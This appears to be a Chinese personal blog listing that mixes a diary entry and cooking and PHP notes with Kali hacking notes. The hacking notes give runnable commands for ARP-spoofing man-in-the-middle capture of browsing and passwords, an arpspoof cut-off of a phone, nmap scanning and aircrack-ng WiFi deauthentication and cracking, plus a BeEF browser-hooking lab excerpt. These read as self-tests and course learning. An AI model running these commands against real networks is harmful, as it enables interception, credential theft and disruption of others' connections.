闲起来真的很可怕
可能会想的很多 认为什么都是无意义无用功,做了很多很多的事情,很多吗? 做了很多无用功的事情罢了。 一个多月了,每天都是无用功。 全都是自以为是的厉害,在别人眼中这只是毫无技巧可言的东西。每天脑子里都是what why how的三连问,我每天都在自我反省,反思今天做了什么,得了什么。但我真的做成了一件事么。 到现在看,我虽然不沉迷游戏,但一天研究这些乱七八糟的技术,或许对现在而言,这些技术就是别人眼中的花里胡哨。没那个必要,真没必要继续下去了。与其游戏能让人丢失自己,我也不想每天都这么的不快乐。很难受,很闲,想多。 不敢发空间,不敢回消息,不敢向别人说出我现在究竟在做什么,至少我肯定不会说我这个月来屁点正事没做成。 很无奈,又回到四年前的样子了。当时为了什么,为了挣那么一点点毫无用处的物质,我浪费了四年。 好不容易找回了自己,现在又丢了。 总是说勿忘初心,方得始终。难道我的初心就是整体做这些无用功的事情么。反问自己,到现在为止,我得到的东西如果当初不这么做,四年后的今天我又是什么样? 四年前说的各种理由,到现在真的很好笑,什么环境,什么动力,全是扯淡。是我无能罢了。 四年后的今天,很庆幸我又回到了当初的那个样子,但这次为什么我会选择当初放弃的路。 四年前为什么不坚持下去,或许那么做现在会更好呢,为什么选择这些到现在发现就是无用功。 我不敢跟别人说出去我现在活得还没当年的好,或许吧, 说出去被别人嘲笑么。  
thumbnail
kali 中间人攻击
抓取被攻击者浏览的图片和网站以及登入帐号密码 打开路由转发 echo 1 >> /proc/sys/net/ipv4/ip_forward 查看是否打开了路由转发 cat /proc/sys/net/ipv4/ip_forward ifconfig查看网卡 我的网卡所wlan0 nmap -sn 192.168.1.1/24 扫描在线主机 ettercap -G 开启嗅探软件 点击Sniff标签,点击Unified sniffing 选择网络接口 点击host标签,点击scan for hosts进行c类地址扫描 等待扫描完成点击hosts list 进入ip地址列表 选择中间人攻击 本次用的是arp欺骗选择arp poisoning---> sniff remote connection(嗅探远程连接) 点击Start标签Start sniffing 开始监听 点击view 标签connections 查看监听状态 查看目标ip的浏览图片 使用driftnet工具 我的etteercap很难扫出ip,所以就用nmap来扫描,只要获取ip和mac地址就行。 因为每次开启ettercap都会重新设置配置。 所以需要重新配置以下转发 刚刚测试的是被攻击的设备浏览图片,现在可以看到很明显已经被抓过来了 现在测试我登入网站。 注意这个位置,  现在我登入了测试网站,发现帐号密码已经被抓出来了 然后测试修改密码 测试成功。
批量post堵塞解决
  如果你之前写的post是这样的,会导致批量post过多,堵塞 post('http://网址', $post_data);//发送到站点1 post('http://网址', $post_data);//发送到站点2 post('http://网址', $post_data);//发送到站点3 解决办法: 新建函数,提取数据库url列表 post('http://'.$url.'/', $post_data);//发送到个个站点
thumbnail
french fires
怎么看都不像 外焦里嫩咋做到的 第一批糊了,第二批太嫩了
thumbnail
Kali进行 BeEF 攻击实战
1. 课程说明 本课程为动手实验教程,为了能说清楚实验中的一些操作会加入理论内容,也会精选最值得读的文章推荐给你,在动手实践的同时扎实理论基础。 注意:实验用的云主机因为配置成本较高,会限制次数,每个实验不超过6次 2. 学习方法 实验楼的 Kali 系列课程包含五个训练营,本训练营主要讲述 Web 应用攻击方法。课程包含20个实验,每个实验都提供详细的步骤和截图。适用于有一定 Linux 系统基础,想快速上手 Kali 渗透测试的同学。 学习方法是多实践,多提问。启动实验后按照实验步骤逐步操作,同时理解每一步的详细内容。 如果实验开始部分有推荐阅读的材料,请务必先阅读后再继续实验,理论知识是实践必要的基础。 3. 本节内容简介 本实验中我们初步接触 BeEF,并使用 BeEF 完成一次渗透实战,原理并不困难,但是原理很重要,需要依次完成下面几项任务: v BeEF 的大体实现结构 BeEF 的所属攻击类型 BeEF 的网页源码窃取 BeEF 的弹窗提示 BeEF 的钓鱼登陆窃密实现 4. 推荐阅读 本节实验推荐阅读下述内容: BeEF github wiki: 5. BeEF 简介 5.1 BeEF 结构 BeEF 是目前最为流行的 web 框架攻击平台,专注于利用浏览器漏洞,它的全称是 The Browser Exploitation Framework。 BeEF 是一个用 ruby 语言编写的开源框架,你可以在 github 中找到它,若是愿意的话向他们还可以提交自己的代码。 BeEF 是这样工作的: 此图来自于 beef_wiki) BeEF 会提供一个 web 界面供操作,只要访问了嵌入 hook.js 页面,亦或者加载了 hook.js 文件的浏览器,就会不断的以 GET 的方式将其自身的相关消息发送到 BeEF 的 server 端,如此便可以掌握对方的详细信息,便可寻找相关漏洞,实行攻击亦或者将至当成肉鸡想其他设备发起攻击。其中被攻击的浏览器通常称之为 Zombie。 就像钓鱼一般,只要鱼想吃鱼饵就会吃到鱼钩,我们就可通过鱼钩来控制鱼、捕获鱼,攻击目标就是鱼,而鱼钩便是 hook.js,这个名字也非常的形象叫做 hook。 (此图来自于 beef_wiki) 而一旦 BeEF 运行起来,其中有两个组件最为重要: User Interface Communication Server 其中 User Interface 用于提供我们所操作的 Web 界面。而 Communication Server 则是用于通过 HTTP 来接收 “中招” 用户浏览器发来的信息,这组件是 BeEF 最为重要的组件了。 其他的功能的都是通过扩展与模块添加而来,我们可以通过 BeEF 的目录便可看出: 在实验桌面中,双击 Xfce 终端,打开终端: 然后我们使用 sudo virsh start Kali 命令启动虚拟机,注意区分大小写,虚拟机的名字是大写的字母开始: 接着使用 SSH 连接到 Kali,注意用户名 root,密码 toor 是不显示的,使用命令 ssh root@kali 即可,因为当前实验环境中已经把 IP 地址和主机名的对应写入到了 /etc/hosts 文件中,避免输入不好记的 IP 地址: 然后我们通过 cd /usr/share/beef-xss/ 命令进入 BeEF 的主目录中: 其中文件的作用: arerules:该目录中的功能会在 BeEF 启动前预加载,并在目标被 hook 的时候触发 beef:一个运行文件,用于启动 BeEF 所有功能的运行脚本 beef_cert.pem:用于 https 时候的证书 beef_key.pem:用于 https 时候的密钥 config.yaml:用于配置 BeEF 启动是加载的一些参数 Gemfile:用于配置 ruby 的一些依赖包 core:是 BeEF 的核心目录,主要功能的实现。并负责加载 extension(扩展模块)与 moudule(攻击模块) extensions:用于放置扩展模块 modules:用于放置各种攻击模块,其中攻击模块主要有这样三个文件: command.js:命令文件; config.yaml:模块的配置文件; module.rb:定义了模块中使用的类,以及一些功能上的处理。 其中最为主要的便是 core、extensions、modules 这三个目录。 5.2 BeEF 的类别 BeEF 的攻击手段属于我们在上文中所介绍的 XSS。 那么所谓的 XSS 是什么呢? 跨站脚本攻击(Cross Site…
thumbnail
利用kali进行arp攻击
利用kali进行arp攻击 在我的网络中找到并 ping 所有活动主机 nmap -sn 网关/24 arpspoof -i 网卡 -t 被攻击ip 网关 首先要知道自己的网卡和网关是多少 一般台式或者虚拟器的都是eth0 笔记本的是wlan0 我的设备设置的名字是xiaomishouhuan4  小米8 IP192.168.1.2 被攻击端 arpspoof -i wlan0 -t 192.168.1.2 192.168.1.1 发送攻击指令 arpspoof -i 网卡 -t 被攻击ip 网关 发送后我的手机就无法上网了,刚刚在刷皮皮虾,直接无法播放下一个视频
Nmap
Nmap 在我的网络中找到并 ping 所有活动主机 nmap -sn 192.168.1.1/24 找到主机上的开放端口 nmap -sS -p 1-65535 -v 192.168.1.2 找到主机上监听端口的服务 nmap -sV 192.168.56.102
WIFI破解
airmon-ng start wlan0 ifconfig airodump-ng wlan0mon airodump-ng -c 13 --bssid DC:FE:18:1B:42:6B -w ~/ wlan0mon aireplay-ng -0 2 -a DC:FE:18:1B:42:6B -c 50:01:D9:7E:F0:3F wlan0mon airmon-ng stop wlan0mon
thumbnail
解决互赞宝被刷恶意登入
原版漏洞:登入的时候只检验了qq和pskey,导致网站用户点赞时出现大量无效用户。 解决原理:直接检验的时候给站长点赞,登入失效则不入数据库。 includes/huzan_ajax.php 这个文件 找到case 'getcookies' 按照上图 把代码插到相应的位置。 $data=get_mpz($_POST['qq'],$_POST['skey'],$_POST['pskey'],你的Q号,$server); if($data=='登录失效'){ $DB->query("UPDATE `zan_users` SET `status` = '0' WHERE `zan_users`.`id` = {$row['id']}"); exit(json_encode(array("code"=>-2,"msg"=>'你TM想白嫖???'))); }   记住把你的QQ改了,这相当于登入的时候给你点赞,可以点赞的或者频繁的都能入库,登入异常的不能入库。  
thumbnail
解决恶意登入显示无名侠客
我把无名侠客改成显示SB 直接解决教程 /view/huzan/huzan..php 然后把 SELECT * FROM `zan_users` WHERE `status` = 1 and `qq` NOT IN ($shangxian) ORDER BY `zan_users`.`logintime` DESC limit 30 改成 SELECT * FROM `zan_users` WHERE `status` = 1 and `qq` NOT IN ($shangxian) ORDER BY `zan_users`.`logintime` and `name` is not null DESC limit 30 然后SB就变少了